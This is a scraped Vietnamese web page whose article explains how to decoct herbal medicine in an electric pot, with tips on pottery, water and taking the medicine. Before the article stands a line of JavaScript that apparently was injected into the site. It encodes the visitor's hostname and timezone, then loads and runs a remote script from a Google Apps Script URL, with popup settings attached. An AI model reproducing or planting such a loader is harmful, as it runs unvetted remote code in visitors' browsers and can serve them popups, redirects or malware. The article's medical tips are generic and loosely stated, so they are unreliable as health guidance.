var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Lưu ngay cách sắc thuốc bắc bằng ấm điện hot nhất hiện nay 2023

Ấm sắc thuốc bằng điện hay còn gọi là siêu sắc thuốc được sử dụng rộng dãi trong nhiều gia đình, chúng được thay thế hoàn toàn siêu sắc thuốc ngày bằng đất ngày xưa vì không đảm bảo an toàn, mất nhiều thời gian, và đôi khi không thể sắc được một số loại thuốc. ấm sắc thuốc bằng điện ra đời và khắc phục được những điểm yếu này của siêu sắc thuốc bằng đất nung ngày xưa.

Hướng dẫn sử dụng ấm sắc thuốc bằng điện đúng cách

ấm sắc thuốc bằng điện được cấu tạo khá đơn giản chúng gồm có một mâm nhiệt đun nước bên trong đáy ấm và được thiết kế 2 chế độ sắc thuốc khác nhau sắc nhanh trong 5h, sắc chậm trong 8h, tuy nhiên bạn nên chọn chế độ sắc chậm để có chất lượng tốt nhất

Khi nước sôi làm ra thuốc sau khoản 5 tới 8 tiếng tuỳ thời gian mà bạn chọn chế độ sắc. Lúc này đèn nguồn sáng báo hiệu chế độ đang nấu Khi nước thuốc cạn tới mức giớ hạn( tới mực của mâm nhiệt) ấm sẽ tự ngắt thường là 1 chén hoặc tới 8 phân chén. Đèn sẻ chuyển sang đèn hâm. Lúc này bạn muốn uống liền thì bạn chắt thuốc ra và uống còn không bạn chưa uống liền thì vẫn để đó để thuốc giữ ấm khi nào uống thì chắt ra.

Về việc chọn ấm sắc thuốc, cách sắc thuốc và khi uống thuốc, các bạn nên chú ý một số điều sau đây để sử dụng ấm sắc thuốc một cách hiệu quả nhất.

Về siêu sắc thuốc: bạn nên chọn những sản phẩm có xuất xứ bát tràng, bởi đây là nôi của gốm sứ việt nam, và cho ra sản phẩm tốt nhất, không độc hại, chất lượng được đảm bảo và có độ bền cao. Bạn có thể chọn một số hẫng như Phú quý, Kosiro, trường thọ….

Nước dùng để sắc thuốc: một số người thường hay dùng nước máy, nước mưa để sắc thuốc, tuy nhiên những loại nước này thường hay chứa tạp chất và có thể sẽ không tốt cho thuốc và làm mất vị thuốc, vì thế nước đung sôi luôn là sự lựa chọn số 1.

Một số chú ý khi uống thuốc:

– Trứng, sữa…luôn làm dạ dày hấp thu kém nhất, vì thế khi đã sử dụng loại này không nên uống thuốc, thời điểm uống thuốc tốt nhất là khi bụng chưa ăn gì.

– Không ăn nhưng đồ ăn làm dạ dày khó tiêu thụ

– Không sử dụng chất kích thích để tăng hiệu quả của thuốc.

– Thực hiện theo lời khuyên của bác sỹ.

Hy vọng những điều trên sẽ giúp bạn có cách sử dụng ấm sắc thuốc bằng điện một cách hiệu quả nhất. nếu còn bất kỳ điều gì cần tư vấn thêm về ấm sắc thuốc, bạn vui lòng để lại bình luận bên dưới hoặc gọi cho chúng tôi theo số Hotline 0247.300.7779 để được tư vấn nhé